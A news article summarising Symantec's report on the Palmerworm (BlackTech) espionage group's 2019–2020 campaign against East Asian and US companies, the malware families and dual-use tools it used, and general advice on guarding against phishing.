Who is Palmerworm?
The Palmerworm APT group, also known as BlackTech, is believed to have started its cybercriminal activities back in 2013. Although it is not certain where the group originates, Taiwanese officials have previously claimed that Palmerworm is backed by China. If this is true, it means that a government backed Chinese hacking group has targeted Chinese companies. Palmerworm is considered an espionage group with their motivation likely to be stealing information from targeted organizations. In past campaigns the group has attacked organizations in the East Asia region, targeting companies in China, Taiwan and Japan. However, in the latest campaign US organizations were also targeted.
The Campaign
The espionage campaign was uncovered by Symantec’s Threat Hunter Team, who detailed their findings in a report published yesterday. Symantec is an American software company that provides cybersecurity software and services. According to Symantec’s report, the campaign targeted businesses of all sizes in the media, construction, engineering, electronics and finance sector. The campaign began in August 2019 and continued into 2020. During the campaign Palmerworm managed to gain access to targeted organizations’ networks and remain undetected for months. Symantec found evidence of the group’s activities on the network of a Taiwanese media company. The group remained active on the company’s network for a year, with activity being detected as recently as August 2020. The Symantec team also observed Palmerworm activity on networks belonging to US organizations. However, the team was unable to ascertain what sector the US organizations targeted belonged to. The report states that Palmerworm had been active on one US organization’s systems for six months without being detected. The other companies targeted include a Chinese construction company and a Taiwanese finance company on whose networks Palmerworm was active for several months. Furthermore, a Taiwanese electronics company was targeted for a couple of weeks. And a Japanese engineering company was targeted for a couple of days. As these last two companies were only targeted for relatively short periods, the report concludes that “The finance, media, and construction industries, then, appear to be of the biggest interest to Palmerworm in this campaign.”
Technology Used
The APT group used dual-use tools and previously unseen custom malware in their latest campaign. The malware included backdoors from the Consock, Waship, Dawit and Nomri custom malware families. In the report the Symantec team states, “We have not observed the group using these malware families in previous attacks – they may be newly developed tools, or the evolution of older Palmerworm tools.” In addition to the new backdoors, Palmerworm used a trojanized custom loader and the network reconnaissance tool, HackTool. As in previous campaigns, the group also used several dual-use legitimate tools to hack into systems and steal data. The tools include Putty for remote access and data exfiltration and PSExec for lateral movement within victims’ systems. Also used were SNScan for network reconnaissance and WinRAR for compressing stolen files before sending the files to themselves. In this campaign, also like in previous attacks, Palmerworm used stolen code-signing certificates to digitally sign malicious payloads. This allows malicious payloads to evade enterprise malware detection mechanisms.
Be Aware of Phishing
As to how the group gained access to targeted organizations, the report explains “We did not see what infection vector Palmerworm used to gain initial access to victim networks in this campaign, however, in the past the group has been documented as using spear-phishing emails to gain access to victim networks.” Unfortunately, the nature of advanced hacking campaigns means they can be difficult to detect and defend against. However, organisations and individuals alike can take steps to protect themselves against such phishing scams as were probably used in Palmerworm’s campaign. As well as using good antivirus software to block suspicious activity, experts also recommend using VPNs for additional cyber protection.